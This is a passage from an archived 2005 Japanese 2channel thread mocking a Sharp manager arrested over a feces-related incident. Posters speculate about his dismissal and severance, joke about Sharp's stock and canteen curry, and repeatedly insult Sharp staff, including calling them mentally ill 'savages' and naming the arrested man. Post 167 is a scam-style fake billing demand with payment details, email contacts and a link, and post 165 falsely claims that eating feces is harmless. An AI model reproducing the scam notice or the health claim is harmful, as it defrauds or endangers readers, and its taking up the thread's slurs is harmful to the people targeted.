という、高度な戦術なんじゃよ!
分かったか!?このハゲカス

157 :目のつけ所が名無しさん:2005/10/07(金) 02:05:29
この人てこれからも普通に勤務するわけ?

158 :闇狩人:2005/10/07(金) 02:12:50
目の付け所がシャープ過ぎるにも程がある。


159 :目のつけ所が名無しさん:2005/10/07(金) 17:35:45
罰金30万円で釈放 スカトロマニア課長

160 :目のつけ所が名無しさん:2005/10/07(金) 18:15:29
解雇しないのかよ
さすが身内に甘いぬるま湯糞企業だな

161 :目のつけ所が名無しさん:2005/10/07(金) 22:02:12
家族はいないのかな?


162 :目のつけ所が名無しさん:2005/10/07(金) 22:35:36
シャープはスカトロマニアに対して高待遇です

163 :目のつけ所が名無しさん:2005/10/08(土) 11:20:13
もし自分から退職願を出したら、当然退職金がもらえるんわけで。。。


164 :目のつけ所が名無しさん:2005/10/08(土) 18:20:55
被害者たちはどう思っているかな。

165 :目のつけ所が名無しさん:2005/10/09(日) 01:08:25
あえて申しますが、ウンコを食べても死んだり病気になったりしません。
ただし、すぐに鮮度が落ちますので新鮮なうちにどうぞ!
目安としては30分が限度でしょう。

166 :目のつけ所が名無しさん:2005/10/10(月) 11:15:39
何処のメーカーにも基地外は一杯いる。
取り敢えずは1年間不買だな。

167 :目のつけ所が名無しさん:2005/10/10(月) 19:34:59
 
動画サイト<ひとり>より通達致します。
お手続きと入れ違いでこの通知が届いた際は、ご容赦下さいます様お願い申し上げます。

お支払い期限【2005-10-01】を超過しております。
早急にご入金の手続きをお願い致します。手続きが遅れる場合は
ご一報下さいます様、併せてお願い致します。

10/17までにご対応を頂けない場合は悪質利用客であると
断定し、回収業務の対象者とさせて頂きます。ご了承下さい。
詳細はサイト内利用規約をご確認下さい。
延滞金(正規利用料金に対し年率14%)は期限【2005-10-01】四週間後より
課金致します。不備等御座いましたら下記問合せ先よりお問合せ下さい。

≪送金先≫
〒 460-0008
愛知県名古屋市中区栄1-22-2
受取人名:ネットワークス

≪お問合せ先≫
hito_0hi@yahoo.co.jp
h_0hitori@yahoo.co.jp
h_hito_h@yahoo.co.jp
hi_in_hh@yahoo.co.jp
 
http://0hi.co.uk/23OY61WYPhnKe/



168 :目のつけ所が名無しさん:2005/10/11(火) 06:24:26

シャープの社員食堂から、カレーに関するメニューが無くなったらしい。


169 :目のつけ所が名無しさん:2005/10/11(火) 18:15:03
想像してこんどから、他でもカレーが食べれなくなる

170 :目のつけ所が名無しさん:2005/10/11(火) 20:01:38
 
シャープの社員って、みんな糞尿投げするの?
怖いね。

171 :目のつけ所が名無しさん:2005/10/11(火) 20:12:04
>168

うそつくな。あるって。
ちなみに田辺ビルの食堂のカレー黄そばウマー。

172 :目のつけ所が名無しさん:2005/10/15(土) 21:11:47
ああ〜シャープしてお腹すっきり

173 :目のつけ所が名無しさん:2005/10/17(月) 21:49:53
栗本メンバー、今日付で全社電話帳から名前が消えたのでage

174 :目のつけ所が名無しさん:2005/10/17(月) 23:13:56
栗本 本日解雇?
社員リストから名前が消えていた 
もしかして自己退職かも でも考えられん


175 :目のつけ所が名無しさん:2005/10/18(火) 10:32:57
後ろ指さされていられないでしょう。
自己都合の方が退職金でるから

176 :目のつけ所が名無しさん:2005/10/18(火) 11:41:06
不当解雇だと裁判になる模様・・・
地位の確認と退職金の支払い、精神的苦痛による慰謝料として600万円・・・


177 :目のつけ所が名無しさん:2005/10/18(火) 11:43:08
これを受けてシャープ側が満額の退職金の支払いをする模様・・・


178 :目のつけ所が名無しさん:2005/10/27(木) 18:55:19
で、管理職社員による糞尿事件についてシャープの公式見解は無いのか??

179 :目のつけ所が名無しさん:2005/10/27(木) 20:44:24
会社自体がウンコですから
ウンコにウンコといっても普通のことです。

180 :目のつけ所が名無しさん:2005/10/29(土) 17:48:02
>>153
今みると、凄い下がってるんですけど・・

181 :目のつけ所が名無しさん:2005/10/29(土) 17:54:30
>>171
ウンコの話してるときカレーの話しすんな

182 :目のつけ所が名無しさん:2005/10/29(土) 21:09:28
ウンコの株は下降傾向をいまだ抜け出せない。
まだ、底値にはなってないような。
どこまで下がるウンコ株?

183 :目のつけ所が名無しさん:2005/10/30(日) 15:19:11
株に無知な俺としては、ウンコ事件後、シャープ株がちょっと上昇したところが解せない

184 :目のつけ所が名無しさん:2005/10/30(日) 16:07:14
大丈夫!ウンコ株7月に1700円台から今や1500円台に下落している
25日平均で見ると株の動きが見やすいよ。

185 :目のつけ所が名無しさん:2005/10/31(月) 16:20:51
松下凄い株価上昇
ウンコシャープ低迷中

186 :目のつけ所が名無しさん:2005/11/01(火) 11:46:35
通常ウンコは下水に流れて行くので、下に落ちていくものなのです。
そして浄化されて消えてなくなるのです。

187 :目のつけ所が名無しさん:2005/11/01(火) 21:49:48
ボットン便所

188 :目のつけ所が名無しさん:2005/11/01(火) 22:32:00
シャープ社員って本当にウンコだな。
私はあの人とは違うのよって顔してる
他のシャープ社員もどうせ似たり寄ったり。
家の近くに工場があるから犯人捕まった今でも
不安いっぱいだ。
栗本の家とも結構近いし。

189 :目のつけ所が名無しさん:2005/11/03(木) 20:52:37
ていうか本社が建物からして胡散臭い

190 :目のつけ所が名無しさん:2005/11/03(木) 21:19:30
本社前のドブ池はなんとかならんのか?

191 :目のつけ所が名無しさん:2005/11/03(木) 22:39:37
シャープ社員って全員精神病の土人なんだろう

192 :目のつけ所が名無しさん:2005/11/03(木) 23:42:27
被害者は事件があったその日、念入りに体を洗った後、
シャープの空気清浄機を使って、除菌イオンに当たっていたのだろう。
念入りに除菌する為に。

193 :目のつけ所が名無しさん:2005/11/03(木) 23:44:17
>192

ナノイーじゃなきゃ除菌できん

194 :目のつけ所が名無しさん:2005/11/03(木) 23:44:24
ナノイーの方が効果高いのでナショナルの空気清浄機を使って除菌したと思う。

195 :目のつけ所が名無しさん:2005/11/03(木) 23:46:22
ケコーンおめ>>193-194

196 :目のつけ所が名無しさん:2005/11/03(木) 23:48:56
なんでそんなオカルトで除菌した気分にしなきゃならんのだw

197 :目のつけ所が名無しさん:2005/11/03(木) 23:49:41
>193-195

なにやってんの?

www

198 :目のつけ所が名無しさん:2005/11/04(金) 11:56:23
>>197糞尿土人にしかわからないことだろ

199 :目のつけ所が名無しさん:2005/11/04(金) 15:25:12
何!糞!

200 :目のつけ所が名無しさん:2005/11/04(金) 23:28:17
200get!

201 :目のつけ所が名無しさん:2005/11/06(日) 22:19:48
世間に対して謝罪しない企業です。

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)